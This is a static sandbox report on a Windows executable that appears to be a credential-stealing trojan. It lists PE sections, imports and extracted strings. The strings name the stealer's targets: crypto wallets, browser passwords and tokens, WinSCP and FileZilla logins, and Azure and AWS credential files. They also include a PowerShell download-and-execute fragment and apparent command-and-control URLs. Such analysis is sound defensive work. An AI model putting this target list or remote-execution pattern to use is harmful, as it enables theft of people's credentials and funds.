Static | ZeroBOX

PE Compile Time

2024-04-05 22:00:03

PE Imphash

891374ed5eda1ba6357d859b0a0690ed

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00021cc3 0x00021e00 6.36107714138
.rdata 0x00023000 0x0000ae22 0x0000b000 5.52976102833
.data 0x0002e000 0x00212ec0 0x00001000 3.84012554008
.rsrc 0x00241000 0x000000b0 0x00000200 4.11190428293
.reloc 0x00242000 0x0000517c 0x00005200 4.79892166204

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x00241058 0x00000056 LANG_ENGLISH SUBLANG_ENGLISH_US ASCII text, with CRLF line terminators

Imports

Library msvcrt.dll:
0x423100 ??_U@YAPAXI@Z
0x423104 memcpy
0x423108 memcmp
0x42310c __CxxFrameHandler3
0x423110 strncpy
0x423114 malloc
0x423118 _wtoi64
0x42311c atexit
0x423120 ??_V@YAXPAX@Z
0x423124 memmove
0x423128 memchr
0x42312c strlen
0x423130 strtok_s
0x423134 strcpy_s
0x423138 strchr
0x42313c memset
Library KERNEL32.dll:
0x423014 ExitProcess
0x423018 GetCurrentProcess
0x42301c lstrlenA
0x423020 LocalAlloc
0x423024 ReadProcessMemory
0x423028 VirtualQueryEx
0x42302c OpenProcess
0x423034 CloseHandle
0x423038 WaitForSingleObject
0x42303c CreateThread
0x423040 GetDriveTypeA
0x423048 GetProcAddress
0x42304c LoadLibraryA
0x423050 HeapAlloc
0x423054 DecodePointer
0x423058 LoadLibraryW
0x42305c GetStringTypeW
0x423060 MultiByteToWideChar
0x423064 LCMapStringW
0x423068 WideCharToMultiByte
0x42306c GetModuleFileNameW
0x423070 GetStdHandle
0x423074 WriteFile
0x423078 RaiseException
0x42307c EncodePointer
0x423080 GetLastError
0x423084 HeapFree
0x423090 IsDebuggerPresent
0x423094 TerminateProcess
0x4230a4 RtlUnwind
0x4230a8 GetCPInfo
0x4230b4 GetACP
0x4230b8 GetOEMCP
0x4230bc IsValidCodePage
0x4230c0 TlsGetValue
0x4230c4 TlsSetValue
0x4230c8 GetModuleHandleW
0x4230cc SetLastError
0x4230d0 GetCurrentThreadId
0x4230d4 Sleep
Library USER32.dll:
0x4230f8 CharToOemA
Library ADVAPI32.dll:
0x423000 RegOpenKeyExA
0x423004 RegGetValueA
Library ole32.dll:
0x423148 CoInitializeEx
0x42314c CoSetProxyBlanket
0x423150 CoCreateInstance
Library OLEAUT32.dll:
0x4230dc VariantClear
0x4230e0 SysAllocString
0x4230e4 SysFreeString
0x4230e8 VariantInit
Library SHLWAPI.dll:
0x4230f0 None

!This program cannot be run in DOS mode.
D%.V%K}V%K}V%K}9S
}X%K}9S
}S%K}_]
\J|U%K}V%J}'%K}9S
}}%K}9S
}W%K}RichV%K}
`.rdata
@.data
@.reloc
SVWh 3B
j h0<B
j=hXIB
j_hPLB
HjMhXNB
j%hXOB
jYhxYB
jWhHZB
j&h8`B
PRhphB
SSPRhxiB
t2hChB
f9NXu\
f;VFs0
Vf;OFsB
Vf;OFsu
Sj QSSWR
|Sh/jB
pSh6jB
SVh;jB
uc9E8t^
SVWh?jB
SVWhGjB
@ShrjB
DSVhWjB
TSVh^jB
WWh@oB
WVh@oB
tFh8pB
PQhPpB
uThlpB
RVVVVVV
QRPh0qB
RVVVVVV
PRh$rB
ElRQVW
tzhPvB
URPQQh
^SSSSS
;t$,v-
UQPXY]Y[
t"SS9] u
<+t"<-t
+t HHt
PPPPPPPP
PPPPPPPP
@wallet_path
SOFTWARE\monero-project\monero-core
\Monero\wallet.keys
X004APTAGDL20N9
M52AYQRJQ6P6M0
5R"S>C
QOBO8125I666
#+tXPG(DOw
96MUN7FA
UE9'-V2
0O3O5XFRK8
?V!p.#<?y
USHKZZJO1VGQ
X5D2RV65SS1
SLWLVJLOZZGXL9FT3J17
?<&- M
KDFTUOPC15KXEW5Q94
-4 .<
5NTZC2OIUTM
c'&.6S#
HS0KXMOFC0G4J
!>;#.y)R%
X4PTSYDZU8ON
]" &8(
NVBNFL46Z
TMTMRJQK7EYTKBHN
='!>C +
505PXXTL
YCA";(-
7J1N17OM8UDR5H
CX,(K&
APWPX404DT3AJV8QC
-FBQ* c3%5]"0
63IPIRDS
Z@="%7*
9ZLVZ80RYZQ
J_1<)"
2HAYVDGHT1X3NSSHYX22
u$.;7(
'2<,+wJ
7T6XEOJNVDSV5
SX45EWLBKT1M67CH0B46
+&1e"p^/-d+YS
7SJLNUG42WQI
V7<-><t
B754YLUAQ
0XAFKIQGG4
E+$4x{
BYZ8ANSSUPR
!+#H5}a}1<>
JXDTK8CIT
PR4PG4JGCLZY
W1OUL95QF
C*48\q
2AU8R97V9JO8X
u$!|7O^5\
PU3K1FEMQ
0_.P5
I03W6Y988H1NWRJQY4MU
CBL09L
01/QW*
30BIZM2M14F5
e}5(((d
DIWBLH
HJ3DT3C
K22OHPC
XU5I60ROUKZ
X'`p#/
PK31E7B0DTZSZGIFOTA7UPC
.Gt+A+B+:7643'== U95
ISMNEUZ2YSNESITY4N
,9?s-'<,1< <G
QLT7CFCYUC
4TMFAHVI
1U6FO0B9MCZ
&\'j$9?
655GUDDTKP
qYZ%4(
HLP9W7EGIDKXK7KQL735D398
(&(#='GxcYRE7[VL
XH9N2C6YK3TIRF
9\7,!5
1363D8PJV86E2
aAYP!K#ydvS=F
GZPMNLRLP81N
GHVMRNB8FFA
' J'48
9JZBTOVBQXKZ85QF693M4F
VS>4[XG$[(
P7037EU4FWBZPDYK8747
RD`N6!Q+
K06RXRAHF9L3F432KZRQQ
7>4%#p"U)F^S?3=?
WRXYJPMRWB6R74ZBJGPD
#>)= 1r;EQ96%5)
NZGLIUVJ59IQNQ
((/,&%y
YII3NBY0T7PLH9
!!8\1~>*'x
E1BTBMD7LLQY3DVW3PDRGQ2P
1(6s)*0,_0
2OPXFJ66MWEE7YPBN1
77NZHUE6E9H
sR"?<0
03Y8W1W6Q1BPT
LH8RZE9CE
OT4CDG4SJ
F6ZW3QFL72E695S3NAVWG9A
]'/>X\(SWA
R<(75+\
EWOEDUXQB7
S6S4YOSLOGH8H
S'r0#6&=-}0
OXMIZFI5
CF6UAOLB1JMC9R
^##7\
899YWDL23
2GO9Q1L8K2B
q5*X%T
P1WJY9GJX645H6
X9.P59,p]Y-w
ZNIBTFUKM
DNVO4KPLBJ8CHN
'$;A*<
0%L&+:
0AW7BE67KHC1OD71XQFPS5CUL8HV3WJ4
w$#{-"_T*$
C 'RB+>4
=S,'!Y<?\9
R9SA6HSFPFCO
MD6MOKVR7
!7B?,;/<v
2547CVD7LEY7IKOU64P
8A9M3YIIC5
GSA27ZEYD4WPIEBNQD3
:%Wt2$+
S1RQFS62SAJ
]=3'?w^?.)
3NABEVYFLUK
$6%)&8
6393S15LPHEPUEYC
bVK^:_T85
7?6 *0
4JA6VX3BJOG9PZK2IH5
s/5u#*A'$;
K?9.A:
YQMAE6GVBY7
>5$1)C4x&5[
Q7PT36KYY
I98UEV66Z7
+ZJ,5"
MHMIAVRJ59O
:!# /3&dQU#
B1ML8JT55NR
1Y!;Y:=
UTWYS25TAK5
EM0EYP8MX
5>Q50~\!4
PYJGIVIGLMA4
"*>5=;.5b)-X
T4X2VLDZNL9EFX9U3UE7T0
5#<X1/:U0q<1Z5@
C5JQQ6TZIXKB
USDLCE
4WKDZFAUVXM0
p2'!.#
ICK311TF4GGXDL4DCR
)Y7&,-.X!
RSR9C6P9GEP6K5NRPH110M27
S$p*$7S
[-=4-CBc$HR
JYQXANL6SEG3IIANO2UO
'"!+W'<
086KKV5WML1F0U0OQ2833SNGZTI
$P69)s/D8Q?
GHNN71NHL2GMOR
,'>[D=
8S59:"
YUGMADYSV7V31UH
1.=-1*
>B"W^"&
UZV0NYP883NMNPWKPULE8
8&]q^/*+
H3YQUYVQ1EA290CU
0%!^6${TQ$0
VB3JVITX
0LD9WFJQQIN57K293SGZ
GX&aMA6&7
NTNYTZ3TS5N8KAZJVW3V5
&+8 ?` !P/U
UM1NGXLI3PCC3J
"d .6%=Z1/*I/
G7OP7MZ8U5PU
>^93Y9\*0
6VTOHYU33HWKMBSK
=-8!Vz&$?,,0.
YQK5R1SLGG6JFW258W10YOHOR9
))"D+22aLU:TD+&+
Q9LED53PJDVTDFCIHA2LYGO0M0K2
z><4Ap<%73
(!,;!5Z!
5 F$T.@
VJI5ORKS9CDBQ
6Z1=2%
0MYKPSWXQHHWGLKUV
:87)9!/
1MUB395ZEW4TIE70
';CMq?6#F;0
5840Q7HXEFCBJIFA7OK0QP7N3VK
w{FI!C
.-&4(C'&`#?A'W39
51DHCJ5KNP4E4
rT0*$Q$9
F76X63P5Q4V43HKQ
S@;A>D
L5B792N72UD
Y-D\e'YV:3
JQVTTJQ9F
="&&=$%_
OP6RMIBV4M97JH3B4Z7
1&X,@s/>Z!Q)v
BB8YKSVNW07197ZI68TV0
.*4!6BS}XN5<Bt=%D
02DQUF9I2R
YTT8DQ0W9
.'$J-?D1n
15P47U9AU96CLEGL
cP7eB0K8
J5I0MVF4JIIQ9
P.u##+
V1FMT35K7F5UF
OI5OMONX3VS
! ==x3*
5WGZVVYLTB9I0
g2 8#4
Z1LKAMZMFHG68464CM1G
3#':>bWgBF*#V
XQ7WGYLQTADPAFYUCD
"!&.05"2
WR5F0OA2X12RRZHC
CJ4ZDLAJ3ED062F
9/P00UsJ
L29ZKKR0SWNBUXCT
\M?9%7D
OI8CP0N9KQWMWKJ6
'L&"^+M
>9#2(>w
5VRZR971VTLC0KQV1UZ
|8&? WRE
S8ZZUP9O3YFEH
V.?'>\;|)#+
NRG8GMBOLGR6OKIA
"#C*8=
9BUBV17F56KSUDCP
AR(gS:&077
OEZJEROOTKG1I3GE
+./7<*;
0O4XUCWVTACKCT4ID
y!@='-2"
BRKU95SW
GSLUF6C
ZF1GJP5M
RDZDOEM9Q8YGL6
$9Z9k)"/w
T1SLAOUKBNEAU62X8YGF
,-0xS5]
2RK2DS3S5VRZ03
P%!3_]
VAY7OR1GBL9OTPH299A
R(;B3'>k*'?=@Z\2
GDCQ0ISUC
PQ6OJ0K29BJY
<s!.c.AJ+%7
OVP83Y8OLCVR
<'<QG<
YU0TT8Y57Z1VPVF3EO
*$\= ]jjG(T&1$#l3}
380M1SWS6UUG
@I\$E6d
0N4OZYA1IBNO1Y44TIS
C?X&.<rn*-":\7k@11'
FJ6JX1M2I6ABEL18
5;Z#,T~m/_/#)%K]
N0A5Q2NF1ULUC
=A-\%W}
X29YBO63EHWN524HAJCA
+CU06*
l&';;X\k*8>&2
0QDSMBM50RCP1ZUEBMD
C (:9'~jS=/%\4
64FJSNSVAT71L
SZ%8*>'3%
ZQM9BBCWFHVGI0GYFFGUHUF
i0-$%'%
755t{,9*
4QMM200G
HMNPV9D43CXM
Q1@W,/#
G7P131DFDO29ELSSYYJ5PAN
!F\7"2?
<3f<.:
34KUYCLMRUI86
BUSBXUC3UOLKRVFE3
6G=*"?;5'1V
17FTV7SHOD2BKP5
!Q02 A
MVQEGII57UIP9KG
5&.GV8
QFIY2K2NPXA3IQK2K9P75EB8USCH9NRS7HWX2VWVTIBQFPAOX18QUMKMDKEKI
!"1&Z'
pBF 0V4>&
O/>&Rdw(S%$!;;&
k!+,,%:
VOCFS6
A3XAYM3NX
1A7'0!Vtx
DV2FSX
UHOA7U6
KURRLN838L
4!!;!JW
1JD18XJ
~:!CY
SR81UBG
7LF:0,
XEULDTC
*:'-10
P4EJFWTDTPF7GVJBC9SU27WLGDH5B7JCCKT2EIMMIRR1SHNZ4SASZQXRH3DCPXBWGD45BQ63XFLLP539ZRBS60MWXBVLFK7UP5UPNRYNWH5TFLCL9DM7
ZC#<(*$Ln
>,1'C6dnrQ+1:(4+
=G'lahrgwt
vr,2[Uaw=,5>?;C04j#1"'<n1:Z9f/,#R-(D
UYMI06TL
,9&V_8
OWH3Y6Z53RL9JLB8986GEYFJYRBSSLOP
bz[R?)
j:#TL]
j8'6<5%#<
SAVREE7
(%&*7N
VAU717AVIXOI29NGZR8FG4GMRC5QJZT
rrca#;4o
g/ T5gx
AKGU1OLX635ECWQF36AG9113HPYBULSDVO1YHV7DWRKBLIPQPLP3TX5JTMNMZKDUK2TY427I87TRQZR99HVI6ZT7SRE4IVN
TIC!"86<#=
; _- z
!/""0-=9>>
%18)W&
Q\T;AG 75z
v*D?0^'
MO00TY
1VXNH4W
DN244O
NRY4YV
IVFNXCA
9)%1&2
NTHC098KHW
85Y574FY
K93I5XU
P@=Z*,
BFKDWI9KHQC
.),-9:
6KC56EF50890L
P$1Xe0$XYLlb
1AYNCGFXTSZ3X
D2<<-&+=
HVN8URO484WODZCA7
-8-J,";Q\a$*64",R
VBO9MVUVIAKPM2NBI
3,,K4&!3-
*#>E!0-
OSLR2GB99RCXW6XPY493NMRDPVBJN52TSFHTCRTPTWISI1Z5ZVUCUYOCAICHE1VDYTEQZDMGLTJ0D
bQV!7tw_+
-@I| !+hp&#>&
-76 1|t21# C#
z84.0uo5 %6-ew
.(#?#U7
85X5FT1L0941ET4PML1BE3YWIGWIN0AOX8CMOL8H328U
*Y\XU+5Y5alG#)F<w
^,?"$Q;G]J,
KZUTS09ISZ8EHAW97S799PDGRRAAMUHL5DMTV
Z<MfI<%$7!a
C0W0168A7FOY9J
_8[XSKoD7#0M/
L58V5VOCAZ867SWJDY
*ZJ;]?<7.(A
D";#0<
DN42KJHTFGTMW
4"UQ.9f'7+=92
MMK6Q6S
!>Q8X
R8H9Z6158QNYCZVVPSUZNMQI
tML4 **58v
6!.'#6:
TYDWTXWGMUHEG4DNRMUY25K
/3(;;,(Zd
79!0\R8
6005N5GEE
^TP6P#
R8QA3ELL4HLR
H43Re8U* 7
SQPUPHIB11PYOG5
b$8-+P
22IKFPC
XHOCUMAI4VT3OKLL8
; =,8(l,L"1]<"#"g
Y8DMZT2WWITTV6FBP3IG
j$40W/2-06xZ#45_-%
MW5AT74EV2V
RQKVHMZ7YVQ7
"#$0!!?Dw??^
DRZIYN
':(&4+
VBCD32Z
0+1!U]"
YB4XCCL
#X4&7?
K8Z05UU6Z2S4Z
F133ENLYTFI6F87OCQPW6NPCIVTUZMKV9CT7HBTY0X12
U4WD %%
_ 4,>%t
#K11Y<
1+C1^\
Q40VXRWMCH3
F_2-1#
18G5X6DOAGB615IWW
VO577I07S1I2VRQA39YU737XGXKUPLMUEZEGX640Q7EF4W
k`N+3=&
)#!7;)
*YWU"D*4hg
OZV676UCY2RI1K7GSGP
(9URE&,+|3$T
YX6MKN6E7EAY22TIU9TNPACAMYOFU2JP8ZG8SNKSB1W8YEYPHBN
(:@]'&3M
9/'.:*
@85V.
]!="<,m
V0+*$)."
G83AYV5AV81
Q@157L
UE4V0CWUZHYAMX
,G&\".
?:*("6
NDMIA97SPCQ
(6(,#U
EZRNWNYUKHR
(5();;<{/$>
EDNV2XMFR8QM
(785Biyv|\=!
KST2V93C
Z1EVNEHD4AQB
)^#"!.&w
Q59I4OGKGKURXMG4
'VK<Z;.&"zabv)+X
CUDUQF
PTL7H2T5O
7lD<S&Ao
GW7A7MAJ7
5VLDWJCFT
479DAIQ1L1X526
JNFL4IZDHBUW3
VM6B5BJZ8PD
WYTGAJWBDYBZR8
I730Z7SNP5PP013TH
L7BZFYTC
EP8ISVIJY
4Q:09;.
0UT4HTQ01PICJJX1R94KM3AWEZDICP
;W)8qcE?;"-/
]7OQ')Q
QQ5A3RPVL9Y2494U5GKRAV
8V+SS\h9P1.>%4
N8L7U6ZSPIXM92GIQG
l)[0Q(2=i
(JY3&!
L6Y5WT8B2
'S j35L#A
U378VO4C6Y67S52TP
NWZEFD7SM28SEEYSJ
C8FZJUUI3B6LGOQB0
rtpt~~
HHH3PK6UU67OO0DBG
CT4MDCF6
1X(#1'[
WYIFZXW3
8:5-7%W
OK2KAL7HNEEC7DH5NOSP7A3W0ZQ5VHNOSC82I6FCUJA3MISTQN2LFG6NQFUK4CWG00T4FOWQIP5XAAKRG7OHOCJLGUMDM5HRX4CWYYOC0LCZLINP5CD7YO1XQHY
WSFBURYZ
$T?6-E-
, E+;Z(;
^/W8G)q{
:!1]\=`#1&#.]
::5!E?f
S="'2"Z$w
ER'M5;2<
G7'('74k
=;/%#,
wfjh~rT
gcvrebik
UCTEMINAG7X3STLRD9UA7H6HJ2K3ICPGQ93AHG0Q7IGRIJUOM7YY5H0MFM4U7U1DSRMTZLJ6JDCZAO9AH5QLO1KJI
KDNGNEK6
,21:(<$
z1P!;?="M
Q._+/nz
$M_.',l
E&!;%/&
B-5Z'[
wtgc~ek}.
{t~w~u{
R55MFSNQD907BZAX2O1EBL0M4NCDQZ1GDKHQOUEUZJ7PIDGGPXVMTEHFESR2QJ9NIT40RUJIKGP1OLE1H6X2DOX8D
S8C2RR7V
ZS912<4
tYT0527T;m
1?$> >
(%Q9%!4
-"!;*#
|tjsryo
CL6CLEQJTGYJPY5ONCMZP13O0VUVHJ465XPINF8C8S4EPR1H2O0MKJXLSSL0T4CJM2O2JWAHDJ066Z8I3N32TRV
#P7;$#/
0)"6F (7
6WZ,U[{f
ABY7?"
J,^:X #
~=F#_"
W9E053HTDQV1WD98GNSIAS0O2TC7GBJ04G22E5FN60WQK7LF3OWPAJUDIZ7L0KMCH56QLH3KHFMK5KD5H7D1O3Z
V#DBR:1
?R%+JW!:
'5Y,WZm
?DX(]Y
e4!PY;48k
3G#8?*
`({qsp
{pwzvr
VWYTP73WWNUJPB53WVMH57KH8VCE3GVXNFL3WXOMOS06LBY4MDRFCV4YLRV34Z3P275KZBH9H93MHO667I1ZYPU1L
Z6W7D0MM
8? 'VA2
<)"-F\1"
\Y/'O%c
V4%9)/"Tw
:/<*CB)/
d?+4//3G
D8DTB7WREX6KS0TER3GRR
w1 .X89
9U(<E:1!
94FUUM
i]"2<#
Y50VT1BCO
@#&A.&
A14ULVX3UXC8
RW:98,@{ .T
MSQKU54EE89
RU8WNCN
&:S2 yn
TRXED08VF6LAU6RNMNKL
=>13QJ3
85G8KC1NA
N9K1GEVL
Z$_!,1
082DNC9GVI
SW\"'$
D1OXLY4A8UV17BJN
X.4#>w.V3?V
26CF8T9AFHGGZZO310GA2RKX
v_"*W3z.(..
,*A]Q>k
MO21N8B139KDEQJT1O
!&PC/J;W\U/!7"d"U)
RDSXKIG19G4JVK
>+41%<4TK4
VO2U1HX
HGOM0OLZLQX
;6#$D*
IN9HFZDT
+<V?5?6'
R0YZ1U0K6DKU44CYZGB
t0)R:B/j0$>QZ0w.?6
ILOJDQHVBILQ2MO48W15XWYKBOSZ0
f/o>-<-97=l~Fmz
wUP4wv-b`"z
TKF0SFYCQVIU8ZCVXSHPADB8LNVWEIY8S5S8FZ
h(,1*2%
0#df`2;)k{
JH01SBSLZ7WYO5KJ0PIHPEUB8I6
rlf:,7#-D
*6F?/]c{
3(1l]1S
P7IAZIV9P9YXAP43XIFDZ8KEWZ3JFIJW1SJRXKUR4I1QQ7AS
X'5?'"
@)={pYF4=/4;J?j15A'k-+#Phj07>;6U;Hl|
8DOQWDN9
OL4HZC5SGNFNYXIQH4YZYL5CVRXYD24U6UCSOU
#Z<?-A~
'5>6+ %![7`y*Z1;
uX4.6rw
OXLDP2WIO
VQDVZCW
;47%;$2
DKYF84ELMN3FSBFIJ8DV8S93D8RM3BYE5WZE
9FFUXK5AOI5RQH
J%40=%F) =
Browns Lake derives its name from Henry Brown, a pioneer settler.
Tiffany Alexandra Brymer (born January 21, 1981) is an American former tennis player.
Andrea Robin Wood (born March 2, 1973) is an American attorney serving as a United States district judge of the United States District Court for the Northern District of Illinois.
f624ecb4a0335cf66bf78da0cad7ec5c
Richard Marston (1847?1917) was an English scenic designer who had a prominent career as a designer for Broadway productions from the 1860s into the early 20th century.
https://ndearn.xyz
Cristina Garmendia y Mendiz?bal (born 1962 in San Sebasti?n) is a Spanish biologist and businesswoman.
Kosse is a town in southern Limestone County, Texas, United States. The population was 464 at the 2010 census
The 2017 Argentina Open was a men's tennis tournament played on outdoor clay courts.
Vigia is a municipality in the northeastern part of the state of Par?, Brazil. The town was founded on 16 January 1616.
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/8.0.500.0 Safari/534.6
https://steamcommunity.com/profiles/76561199662282318
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
https://t.me/t8jmhl
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
https://steamcommunity.com/profiles/76561199662282318
sql.dll
sqln.dll
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
sqln.dll
sqln.dll
------
------
------
build_id
------
------
------
build_id
------
------
file_data
------
------
------
build_id
------
passwords.txt
Downloads
Downloads
SELECT target_path, tab_url from downloads
GoogleAccounts
GoogleAccounts
SELECT service, encrypted_token FROM token_service
AccountId
Opera GX
Preferences
\BraveWallet\Preferences
Google Chrome
passwords.txt
Opera GX
Opera Crypto
Opera GX
0123456789ABCDEF
Software\Martin Prikryl\WinSCP 2\Configuration
UseMasterPassword
Security
Software\Martin Prikryl\WinSCP 2\Sessions
Soft: WinSCP
Host:
HostName
PortNumber
Login:
UserName
Password
Password:
passwords.txt
\AppData\Roaming\FileZilla\recentservers.xml
<Host>
<Port>
<User>
<Pass encoding="base64">
Soft: FileZilla
Host:
Login:
Password:
passwords.txt
Stable\
Stable\
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
N0ZWFt
steam.exe
invalid string position
string too long
Windows 11
CurrentBuildNumber
SOFTWARE\Microsoft\Cryptography
MachineGuid
Unknown
%d/%d/%d %d:%d:%d
Unknown
Unknown
Unknown
Unknown
Version:
Date:
MachineID:
GUID:
HWID:
Path:
Work Dir: In memory
Windows:
Install Date:
Computer Name:
User Name:
Display Resolution:
Keyboard Languages:
Local Time:
TimeZone:
[Hardware]
Processor:
Cores:
Threads:
VideoCard:
[Processes]
[Software]
information.txt
C:\ProgramData\
Invoke-Expression (Invoke-WebRequest -Uri "
" -UseBasicParsing).Content
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\ProgramData\
%s\*.*
%s\%s\%s
*%DRIVE_FIXED%*
*%DRIVE_REMOVABLE%*
%DRIVE_REMOVABLE%
%DRIVE_FIXED%
\.azure\
Azure\.azure
\.aws\
Azure\.aws
\.IdentityService\
Azure\.IdentityService
msal.cache
Soft\Steam\steam_tokens.txt
kernel32.dll
NtQueryInformationProcess
dbghelp.dll
HttpQueryInfoA
InternetSetOptionA
SymMatchString
ZG:XA
ZG:c=
Unknown exception
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
CorExitProcess
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
1#QNAN
1#SNAN
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
memset
memcmp
__CxxFrameHandler3
??_U@YAPAXI@Z
memcpy
strchr
strcpy_s
strtok_s
strlen
memchr
memmove
??_V@YAXPAX@Z
atexit
_wtoi64
malloc
strncpy
msvcrt.dll
ExitProcess
GetCurrentProcess
lstrlenA
LocalAlloc
ReadProcessMemory
VirtualQueryEx
OpenProcess
FileTimeToSystemTime
CloseHandle
WaitForSingleObject
CreateThread
GetDriveTypeA
GetLogicalDriveStringsA
GetProcAddress
LoadLibraryA
KERNEL32.dll
CharToOemA
USER32.dll
RegGetValueA
RegOpenKeyExA
GetCurrentHwProfileA
ADVAPI32.dll
CoCreateInstance
CoSetProxyBlanket
CoInitializeSecurity
CoInitializeEx
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
RaiseException
EncodePointer
GetLastError
HeapFree
DecodePointer
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
TerminateProcess
InitializeCriticalSectionAndSpinCount
LeaveCriticalSection
EnterCriticalSection
RtlUnwind
GetCPInfo
InterlockedIncrement
InterlockedDecrement
GetACP
GetOEMCP
IsValidCodePage
TlsGetValue
TlsSetValue
GetModuleHandleW
SetLastError
GetCurrentThreadId
WriteFile
GetStdHandle
GetModuleFileNameW
WideCharToMultiByte
LCMapStringW
MultiByteToWideChar
GetStringTypeW
LoadLibraryW
HeapAlloc
IsProcessorFeaturePresent
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVtype_info@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
0f0&1B1V1\2
8(8H8u8
9,9E9r9
="=/===J=O=]=s=
%1.161<1F1P1Z1d1l1
2A2H2p2x2
3'3.3I3y3
8 8%81868;8G8L8Q8]8b8g8s8x8}8
9)9.939?9D9I9U9Z9_9k9p9u9
:!:&:+:7:<:A:M:R:W:c:h:m:y:~:
;;$;0;5;:;F;K;P;\;a;f;u;z;
<(<-<2<><C<H<T<Y<^<j<o<t<
= =%=*=6=;=@=L=Q=V=b=g=l=x=}=
>">.>3>8>D>I>N>Z>_>d>p>u>z>
?&?+?0?<?A?F?R?W?\?h?m?r?~?
0 0%04090>0J0O0T0`0e0j0v0{0
1)1.131B1G1L1X1]1b1n1s1x1
2!2&2+272<2A2P2U2Z2f2k2p2|2
3#3-34393E3J3O3^3c3h3t3y3~3
4'4,414=4B4G4S4X4]4l4q4v4
55$5)555:5?5K5P5U5a5f5k5z5
6!6-62676C6H6M6Y6^6c6o6t6y6
7%7*7/7;7@7E7O7V7[7g7l7q7}7
8"8'83888=8I8N8S8_8d8i8u8z8
9+90959A9F9K9W9\9a9m9r9w9
: :%:*:9:>:C:O:T:Y:e:j:o:{:
;";.;3;8;G;L;Q;];b;g;q;x;};
<&<+<0<<<A<F<U<Z<_<k<p<u<
=#=(=4=9=>=J=O=T=c=h=m=y=~=
> >,>1>6>B>G>L>X>]>b>q>v>{>
?$?)?.?:???D?P?U?Z?f?k?p?
0!0&02070<0H0M0R0^0c0h0t0y0~0
1*1/141@1E1J1V1[1`1l1q1v1
2"2'2,282=2B2N2S2X2d2i2n2z2
3!30353:3G3V3
<B<T<v<
=!=+=f=
>%>6>G>Y>s>
5-545F5s5
8(838X8{8
:=:F:M:q:|:
:=;H;R;\;
;"<.<B<S<d<
=6>L>h>v>
=%=*=7=>=K=f=
?6?P?q?|?
0)10171>1f1}1
2!2(2-2;2H2M2R2_2e2l2w2|2
2&3B3_3l3y3
4?4H4f4
5"5-5}5
7$7@7\7w7
8)81888K8S8Z8m8u8|8
;M<^<p<
=0N0`0p0
2-2U2c2
626M6i6
878S8e8
:;:U:e:
=@>Z>a>q>
051X1`1n1
2&2+212F2p2
2>3U3^3m3
4 4'4,474B4J4Q4W4b4h4s4~4
5'5;5M5
8-8D8K8X8p8
9,9A9J9X9m9u9
:!:(:;:C:J:]:e:l:
:S;];o;
2,2B2\2
8A9N9[9h9u9
9":M:}:
;$<N<~<
0+080E0R0c0t0
0$1Q1i1
3#4;4S4k4
8F:]:q:
<H=Y=`=p=
=3>:>O>V>^>
?#?B?I?U?\?q?x?
